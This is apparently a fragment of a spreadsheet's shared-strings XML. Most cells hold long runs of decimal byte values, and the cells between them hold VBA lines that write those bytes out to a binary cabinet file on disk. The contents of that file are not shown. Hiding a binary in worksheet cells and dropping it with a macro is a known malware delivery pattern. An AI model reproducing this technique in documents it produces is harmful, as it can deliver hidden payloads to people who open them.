    <t xml:space="preserve">94 11 194 38 34 156 17 40 60 201 199 131 21 143 188 88 153 161 38 12 186 80 99 79 217 206 133 242 54 113 180 163 80 25 69 148 238 31 137 24 184 249 168 123 202 98 211 66 173 134 123 36 183 129 163 197 35 138 81 0 209 25 200 249 201 252 202 44 243 190 35 66 101 214 7 138 120 106 13 112 126 83 11 17 145 129 164 77 171 84 195 26 238 106 175 5 240 44 229 59 178 40 46 5 81 121 24 80 97 191 131 218 103 118 33 0 206 140 27 98 146 54 63 218 220 152 227 38 208 8 185 170 193 113 233 17 32 143 177 9 83 13 151 102 96 82 101 141 252 183 96 57 50 128 254 169 84 117 164 162 162 239 226 46 36 129 226 3 101 91 113 55 217 206 1 37 132 141 202 217 212 95 139 195 246 171 44 28 95 132 192 209 42 247 169 153 197 200 67 68 237 95 152 187 254 128 87 3 41 195 39 151 75 248 34 202 71 13 230 110 36 26 176 135 76 90 125 115 215 17 124 128 203 191 75 28 96 167 58 28 219 243 179 184 235 90 240 89 206 128 88 80 4 205 125 16 245 120 28 30 143 219 235 241 8 69 217 139 213 211 162 108 87 216 69 149 242 161 207 180 35 83 148 109 97 231 121 60 149 168 198 206 6 40 245 52 112 171 83 137 46 187 229 15 120 78 54 101 91 128 121 179 120 213 76 7 162 23 81 60 124 52 129 43 179 127 129 36 35 134 49 187 60 239 110 113 16 136 121 94 22 247 5 254 25 201 25 116 136 114 165 188 238 51 253 56 115 180 109 68 73 173 244 121 229 41 159 146 219 223 167 102 46 199 218 3 200 40 33 229 70 65 238 114 17 170 115 235 112 70 228 12 173 42 8 102 76 224 78 249 239 46 33 50 75 144 165 24 36 108 155 21 181 136 223 71 72 251 112 203 172 16 10 52 83 213 129 85 137 41 125 8 195 15 48 137 88 166 252 86 130 17 2 127 182 9 250 218 14 188 232 74 216 117 191 210 94 167 139 186 195 230 174 95 96 60 87 170 163 15 83 12 54 37 205 94 216 158 32 14 231 19 89 168 99 253 91 7 118 35 63 140 248 116 93 33 143 65 108 30 175 245 47 76 145 122 72 247 253 45 89 161 </t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t xml:space="preserve">173 208 61 163 14 56 18 83 68 51 31 102 58 251 73 231 23 97 87 107 45 181 191 174 36 137 36 102 131 125 243 228 42 209 136 178 223 210 222 114 106 164 223 192 46 4 94 134 75 5 44 41 77 177 120 151 56 40 190 255 85 149 148 152 42 48 0 223 83 76 175 118 225 155 249 120 251 47 109 231 180 193 46 63 163 74 139 207 112 229 221 231 6 86 209 157 92 98 96 228 17 37 69 140 20 19 153 47 252 57 52 188 129 44 20 175 170 236 12 223 68 55 38 162 158 18 86 224 130 38 133 214 210 14 197 204 71 141 112 56 214 210 140 66 195 223 80 33 255 133 177 253 135 42 65 92 205 116 35 83 77 158 63 139 34 182 112 128 66 17 187 14 153 18 243 190 48 244 81 75 90 221 143 114 51 155 41 179 70 242 64 98 142 9 210 91 241 89 35 28 129 91 55 242 46 81 12 250 42 81 178 168 123 49 23 74 225 190 62 49 151 162 170 225 228 136 255 10 87 80 89 54 61 234 164 147 0 187 195 120 56 88 51 44 23 3 23 147 69 72 56 140 66 63 190 65 138 184 176 129 241 186 131 208 64 173 186 4 149 15 250 99 10 148 88 225 198 23 155 77 252 184 202 46 4 1 32 155 189 79 90 188 83 52 189 38 148 129 140 80 108 226 219 95 163 41 110 122 157 1 121 131 162 215 24 25 63 35 80 55 188 198 40 145 218 61 137 148 38 215 32 55 110 11 215 138 105 152 238 108 163 177 35 206 34 86 152 196 245 166 252 10 134 75 36 184 69 60 21 175 215 194 101 169 164 232 17 96 103 133 53 140 80 72 11 79 152 170 54 30 161 169 119 223 245 22 46 202 125 164 48 55 151 240 246 12 14 125 76 172 54 1 225 30 117 144 65 154 187 241 82 23 224 194 112 161 150 28 110 6 161 112 76 108 49 137 223 99 112 4 53 146 105 39 223 190 135 166 88 151 183 82 122 194 162 110 216 67 87 111 134 22 82 195 172 173 117 57 64 121 228 159 17 158 154 134 82 175 71 254 152 36 24 168 22 48 136 69 123 24 185 6 31 215 232 61 66 161 9 234 50 80 1 138 196 197 123 148 62 242 5 136 50 155 140 68 201 196 198 3 170 71 </t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <t xml:space="preserve">126 65 171 95 77 178 99 139 82 9 171 194 136 11 68 231 108 183 232 204 114 203 109 58 16 140 176 15 95 117 128 64 177 105 176 226 223 230 11 138 65 50 51 112 115 235 198 208 208 1 174 106 170 79 6 82 86 165 75 156 184 233 244 167 100 242 14 129 92 166 88 201 216 142 29 110 133 233 179 91 216 84 56 65 206 2 84 209 180 95 241 138 87 64 132 176 255 53 22 153 187 103 3 104 172 51 115 151 76 116 61 92 154 222 161 185 235 52 46 212 13 236 213 220 117 133 188 50 108 2 36 201 197 237 6 89 130 220 220 80 33 93 207 223 183 13 164 84 217 103 70 9 82 203 242 185 165 127 194 80 94 4 187 218 81 197 71 151 239 92 160 149 184 229 187 81 165 18 213 82 188 108 15 24 141 209 186 189 208 130 79 254 60 131 72 202 82 247 86 100 154 89 210 170 193 140 221 99 134 207 45 211 19 137 186 102 82 122 117 42 108 183 67 237 48 38 45 219 45 95 128 156 58 11 240 170 58 92 49 129 75 34 45 223 191 69 185 87 114 49 18 169 128 218 134 165 242 179 102 242 226 179 52 112 77 59 219 110 237 81 98 243 177 72 157 3 70 123 171 254 10 14 101 59 36 56 67 132 159 207 66 132 226 231 183 98 16 48 236 111 38 244 180 14 254 226 167 31 143 68 250 176 64 50 133 250 218 73 216 3 196 45 3 25 194 28 183 169 243 6 126 31 18 156 194 135 51 20 25 78 50 217 204 25 98 165 9 223 144 188 162 211 34 126 150 243 93 147 248 232 24 127 100 204 215 255 137 89 124 79 220 61 86 127 140 134 149 94 35 116 140 73 207 24 138 0 51 161 250 154 80 62 44 154 210 129 238 9 229 81 238 169 254 235 116 224 225 146 45 66 185 201 254 254 78 35 242 0 101 233 180 189 44 157 225 138 129 15 231 175 91 91 102 163 38 34 116 234 83 169 204 64 143 158 158 219 254 106 209 120 50 151 3 189 206 205 87 178 249 254 33 189 24 160 117 136 55 94 69 29 29 0 37 33 80 27 13 45 50 98 123 58 45 144 40 13 81 198 8 162 95 27 3 200 136 95 244 171 244 58 94 125 120 167 49 240 240 22 96 216 248 11 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">128 215 101 115 247 139 40 210 194 57 45 31 35 24 10 149 209 146 71 237 199 1 205 157 137 2 140 249 184 177 122 76 252 2 26 192 234 246 27 59 19 196 27 246 247 217 39 196 242 168 88 65 219 43 226 176 255 37 65 239 15 4 183 147 115 55 220 196 126 26 193 94 47 142 97 127 114 238 190 91 176 175 160 73 147 140 88 66 11 165 90 156 22 75 24 161 148 17 43 163 124 199 101 138 75 206 239 48 153 187 4 164 123 229 195 146 233 122 12 18 227 0 38 0 124 41 45 64 11 165 180 189 148 225 182 245 150 77 161 121 213 218 83 110 30 239 239 129 120 203 252 80 135 153 226 166 190 142 136 136 239 159 82 160 219 228 153 19 41 169 232 213 162 228 44 101 1 1 178 72 235 134 72 137 6 85 69 67 58 182 58 93 4 239 228 60 17 38 213 53 44 204 18 54 165 143 169 32 60 221 192 243 143 219 14 175 219 243 68 146 106 64 125 98 65 221 86 124 208 54 27 139 77 175 83 32 225 214 161 44 234 169 0 22 133 148 147 42 250 228 36 187 25 146 212 107 58 44 252 129 30 236 76 3 130 244 120 113 161 22 45 182 132 218 10 97 78 248 173 244 56 201 225 91 25 149 107 240 192 129 104 54 169 167 73 150 218 108 185 245 17 153 108 122 49 147 108 121 58 212 63 148 32 30 37 128 57 71 165 178 105 151 43 164 226 140 10 183 108 153 78 88 109 184 23 212 52 132 183 39 34 200 78 35 47 103 136 105 88 85 72 195 195 164 160 90 123 63 22 9 75 16 217 152 238 1 142 74 92 55 30 47 116 228 147 150 63 173 25 180 72 197 51 248 11 195 112 46 96 171 149 192 166 233 152 202 191 167 158 250 132 47 143 170 2 119 77 177 192 54 1 49 205 54 114 74 134 36 92 19 125 216 147 120 198 126 94 168 102 90 102 138 107 104 209 62 175 60 58 111 60 245 125 46 149 143 100 216 171 199 160 32 248 123 8 185 54 241 172 253 12 130 101 222 2 150 8 96 202 191 217 207 112 85 0 212 50 141 255 30 3 162 22 228 1 164 242 239 88 239 222 88 189 52 82 70 224 63 1 248 169 114 30 218 71 157 233 62 7 133 108 134 </t>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t xml:space="preserve">71 62 139 22 41 226 26 139 96 16 11 45 124 158 74 212 179 102 200 20 230 16 44 11 45 162 133 191 161 10 149 99 108 134 248 204 94 92 54 177 125 111 81 12 145 101 162 150 213 92 52 175 50 58 143 187 134 166 11 82 113 81 234 135 34 119 141 155 33 254 0 101 98 213 53 6 133 124 63 45 142 207 203 79 61 205 94 18 225 92 30 183 169 26 113 137 17 150 242 107 98 25 180 251 30 151 166 119 19 176 66 39 91 186 143 181 39 126 112 97 181 50 42 2 192 134 235 180 152 146 3 244 231 10 208 158 254 113 122 45 63 254 240 147 112 240 55 219 71 205 93 168 12 208 15 73 13 28 144 142 156 184 19 49 38 181 231 209 163 167 132 234 203 243 54 245 20 9 224 199 205 92 30 218 218 148 95 158 155 170 60 20 127 46 8 172 244 12 217 161 163 167 230 206 28 55 67 53 46 85 7 94 67 195 22 129 40 28 224 221 52 223 17 165 144 42 193 121 221 205 0 65 50 119 237 35 231 248 154 216 126 133 150 76 87 132 221 244 55 28 225 218 222 178 36 154 31 135 35 156 218 177 96 188 63 212 145 74 245 64 14 151 74 142 162 248 222 169 79 147 237 19 81 192 39 185 189 167 72 121 48 14 48 77 90 27 59 182 201 223 163 17 227 55 8 182 144 253 38 201 254 36 121 25 144 26 52 130 18 82 132 178 105 99 104 36 20 21 185 97 227 7 210 90 3 102 45 26 131 245 17 167 118 31 147 218 12 194 10 110 150 125 14 110 121 110 58 180 101 39 135 148 155 162 223 53 144 35 48 210 74 90 83 60 147 35 144 134 247 13 136 67 170 189 159 203 149 138 4 55 218 147 170 75 240 96 248 98 231 146 133 115 105 31 100 107 120 237 114 34 23 152 94 27 163 117 111 59 97 129 25 56 69 90 5 105 113 167 118 215 217 7 133 85 22 246 219 1 186 14 37 132 58 188 178 128 225 109 214 75 76 28 90 248 248 226 15 191 45 172 204 224 215 50 170 176 66 120 146 86 19 73 23 171 44 192 204 163 62 137 40 4 200 253 230 19 191 107 17 157 140 237 92 119 24 246 211 16 8 165 98 36 240 112 125 24 119 224 163 82 87 46 </t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">217 130 174 49 193 193 8 14 26 248 151 82 152 158 47 2 116 255 239 205 198 54 19 97 146 235 144 200 233 184 160 145 6 170 87 159 195 73 255 27 252 228 210 126 99 215 114 105 181 133 47 142 170 124 207 101 184 221 85 169 103 12 130 65 199 216 48 4 48 133 61 99 32 56 9 197 244 96 72 134 12 204 76 196 102 165 226 97 251 241 157 131 168 69 88 103 74 68 181 94 192 176 5 192 4 39 35 149 154 132 98 70 112 210 124 237 11 69 148 240 198 11 184 198 189 171 10 123 143 142 247 119 133 129 244 244 172 45 228 140 201 173 52 33 179 226 59 167 254 0 215 143 155 17 35 154 2 15 152 112 219 73 237 237 229 176 5 152 49 59 195 90 97 100 43 11 90 57 228 204 248 235 233 193 57 252 245 236 93 89 154 202 24 217 228 136 72 255 58 3 64 247 99 70 164 243 58 190 145 5 167 119 94 63 78 197 52 221 12 126 190 154 114 83 201 140 156 60 255 142 106 3 234 246 11 242 204 100 0 46 113 153 180 151 72 86 71 90 102 143 56 104 52 209 9 51 202 21 88 147 28 67 127 212 104 28 208 20 237 27 128 34 172 230 7 172 157 215 137 132 245 43 165 240 77 172 229 149 207 254 78 147 212 108 186 164 38 153 180 135 52 210 168 96 128 102 51 226 5 182 105 208 186 241 67 69 238 255 125 162 120 94 179 117 196 231 1 175 246 60 224 107 89 255 205 175 3 252 242 135 84 110 169 206 123 146 7 14 238 46 94 166 88 75 49 203 20 115 233 158 192 53 133 241 4 62 87 140 158 192 136 154 217 138 2 216 20 97 118 174 45 188 241 118 202 127 50 229 94 205 28 199 215 82 25 103 137 179 124 66 151 62 133 216 213 24 216 101 64 106 217 69 49 86 251 110 91 56 231 40 107 41 97 153 18 46 221 141 61 187 177 103 247 205 158 121 83 174 122 123 163 164 120 59 163 217 226 81 126 232 110 24 239 132 149 81 63 109 144 232 126 214 40 82 145 111 170 174 91 157 250 204 255 192 102 103 240 227 67 226 199 187 210 110 121 78 181 169 144 187 235 219 246 57 228 213 53 205 35 95 142 130 56 18 173 234 86 185 28 111 128 137 </t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t xml:space="preserve">103 85 197 40 100 222 195 23 224 19 47 197 206 244 202 231 117 195 215 12 229 23 112 137 251 228 99 154 113 158 102 28 10 3 138 122 125 1 163 77 221 172 219 162 22 197 217 162 62 56 226 48 241 108 154 91 174 252 23 221 4 213 176 154 31 207 104 159 65 96 212 197 175 202 63 248 141 170 146 68 21 159 253 42 21 51 65 125 3 27 143 104 186 109 114 114 101 225 2 42 32 97 113 186 195 112 172 216 52 190 196 196 12 58 201 35 171 50 13 18 180 228 204 128 2 200 66 177 6 200 4 95 67 195 70 139 155 213 160 17 56 230 175 76 108 47 76 44 63 228 136 244 13 239 34 226 184 25 31 171 213 19 56 90 26 197 228 24 143 61 27 120 67 143 237 156 119 164 63 228 27 116 93 52 161 168 88 45 179 201 112 171 12 184 84 139 146 26 242 171 212 160 235 50 10 107 135 145 200 116 31 229 166 141 252 202 193 49 249 137 76 43 8 227 116 168 92 13 5 140 98 255 230 121 3 57 17 246 129 98 118 110 49 155 121 243 12 10 115 200 251 234 252 4 124 143 184 6 25 97 197 162 69 28 104 73 123 141 80 7 151 133 143 90 216 123 249 168 149 205 226 163 185 108 10 31 117 112 175 11 220 176 146 57 232 26 198 113 163 73 233 48 17 36 141 66 245 240 47 169 41 136 14 77 81 243 142 191 69 78 243 209 167 150 128 48 254 14 251 109 96 148 231 116 94 71 213 22 187 28 66 35 10 192 141 32 244 12 186 162 164 157 101 16 65 109 176 178 80 224 162 202 2 0 1 145 156 157 5 33 8 203 108 178 253 56 59 245 210 10 13 30 101 117 196 49 170 105 66 77 111 226 83 73 247 32 155 46 166 61 15 99 26 253 96 94 121 6 204 27 217 140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 